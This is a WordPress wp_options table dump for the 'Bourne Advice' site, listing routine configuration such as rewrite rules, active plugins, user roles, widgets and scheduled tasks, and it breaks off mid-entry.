INSERT INTO `wp_options` VALUES (1,'siteurl','http://www.bournesociety.org.uk','yes'),(2,'home','http://www.bournesociety.org.uk','yes'),(3,'blogname','Bourne Advice','yes'),(4,'blogdescription','Helping You Find a Solution','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','amber.platts@vanillacircus.co.uk','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','no'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','closed','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/%postname%','yes'),(29,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins1','a:14:{i:0;s:37:\"wp-hide-security-enhancer/wp-hide.php\";i:1;s:27:\"ad-inserter/ad-inserter.php\";i:2;s:19:\"akismet/akismet.php\";i:3;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:4;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:5;s:36:\"contact-form-7/wp-contact-form-7.php\";i:6;s:33:\"import-html-pages/html-import.php\";i:7;s:27:\"js_composer/js_composer.php\";i:8;s:41:\"post-type-switcher/post-type-switcher.php\";i:9;s:47:\"quick-featured-images/quick-featured-images.php\";i:10;s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";i:11;s:59:\"ultimate-social-media-icons/ultimate_social_media_icons.php\";i:12;s:38:\"wp-find-and-replace/search-replace.php\";i:13;s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','shootingstar','yes'),(41,'stylesheet','shootingstar','yes'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','51917','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','1','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:4:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;i:3;a:3:{s:5:\"title\";s:30:\"Contact Bourne Marriage Advice\";s:4:\"text\";s:48:\"[contact-form-7 id=\"323\" title=\"Contact form 1\"]\";s:6:\"filter\";s:7:\"content\";}i:5;a:3:{s:5:\"title\";s:10:\"Disclaimer\";s:4:\"text\";s:135:\"This is an introductory guide and is not a definitive source of legal information. Please contact a legal advisor for more information.\";s:6:\"filter\";s:7:\"content\";}}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:3:{s:33:\"import-html-pages/html-import.php\";s:26:\"html_import_remove_options\";s:59:\"ultimate-social-media-icons/ultimate_social_media_icons.php\";s:20:\"sfsi_Unistall_plugin\";s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:3:{s:5:\"title\";s:13:\"Tips & Advice\";s:6:\"number\";i:20;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:7:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:4:{i:0;s:8:\"search-2\";i:1;s:13:\"sfsi-widget-3\";i:2;s:14:\"recent-posts-2\";i:3;s:6:\"text-3\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";N;s:9:\"sidebar-5\";a:1:{i:0;s:6:\"text-5\";}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'cron','a:14:{i:1675210737;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675210831;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675211955;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675239912;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675240751;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1675240755;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675246831;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675247021;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675248188;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675253964;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675254068;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675254358;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675288949;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(108,'theme_mods_twentyseventeen','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:3:\"top\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1503404825;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(123,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:32:\"amber.platts@vanillacircus.co.uk\";s:7:\"version\";s:5:\"5.9.5\";s:9:\"timestamp\";i:1666052374;}','no'),(141,'WPLANG','','yes'),(146,'recently_activated','a:0:{}','yes'),(147,'html_import','a:44:{s:14:\"root_directory\";s:39:\"/var/www/bournesociety.org.uk/html/site\";s:7:\"old_url\";s:0:\"\";s:10:\"index_file\";s:10:\"index.html\";s:15:\"file_extensions\";s:14:\"html,htm,shtml\";s:8:\"skipdirs\";s:25:\"images,includes,Templates\";s:14:\"import_content\";s:3:\"tag\";s:11:\"content_tag\";s:3:\"div\";s:14:\"content_tagatt\";s:2:\"id\";s:14:\"content_attval\";s:7:\"content\";s:14:\"content_region\";s:0:\"\";s:14:\"document_mimes\";s:84:\"rtf,doc,docx,xls,xlsx,csv,ppt,pps,pptx,ppsx,pdf,zip,wmv,avi,flv,mov,mpeg,mp3,m4a,wav\";s:9:\"meta_desc\";i:1;s:6:\"encode\";i:1;s:10:\"allow_tags\";s:99:\"<p><br><img><a><ul><ol><li><dl><dt><dd><blockquote><cite><em><i><strong><b><h2><h3><h4><h5><h6><hr>\";s:16:\"allow_attributes\";s:18:\"href,alt,title,src\";s:12:\"import_title\";s:3:\"tag\";s:9:\"title_tag\";s:5:\"title\";s:12:\"title_tagatt\";s:0:\"\";s:12:\"title_attval\";s:0:\"\";s:12:\"title_region\";s:0:\"\";s:17:\"remove_from_title\";s:0:\"\";s:4:\"type\";s:4:\"post\";s:6:\"status\";s:7:\"publish\";s:9:\"timestamp\";s:9:\"filemtime\";s:4:\"user\";i:1;s:11:\"root_parent\";s:0:\"\";s:13:\"page_template\";s:1:\"0\";s:8:\"date_tag\";s:3:\"div\";s:11:\"date_tagatt\";s:2:\"id\";s:11:\"date_attval\";s:4:\"date\";s:11:\"date_region\";s:0:\"\";s:16:\"customfield_name\";a:1:{i:0;s:0:\"\";}s:15:\"customfield_tag\";a:1:{i:0;s:3:\"div\";}s:18:\"customfield_tagatt\";a:1:{i:0;s:5:\"class\";}s:18:\"customfield_attval\";a:1:{i:0;s:10:\"fieldclass\";}s:18:\"customfield_region\";a:1:{i:0;s:0:\"\";}s:8:\"post_tag\";s:0:\"\";s:11:\"post_format\";s:0:\"\";s:11:\"index_files\";s:0:\"\";s:12:\"import_field\";a:1:{i:0;N;}s:16:\"customfield_html\";a:1:{i:0;N;}s:10:\"clean_html\";i:0;s:12:\"title_inside\";i:0;s:8:\"firstrun\";b:0;}','no'),(148,'wph_environment_hash','2593faf57761c3db449c84d3aa991f91','yes'),(149,'wph_settings','a:3:{s:15:\"module_settings\";a:2:{s:16:\"style_file_clean\";s:2:\"no\";s:22:\"child_style_file_clean\";s:2:\"no\";}s:13:\"recovery_code\";s:32:\"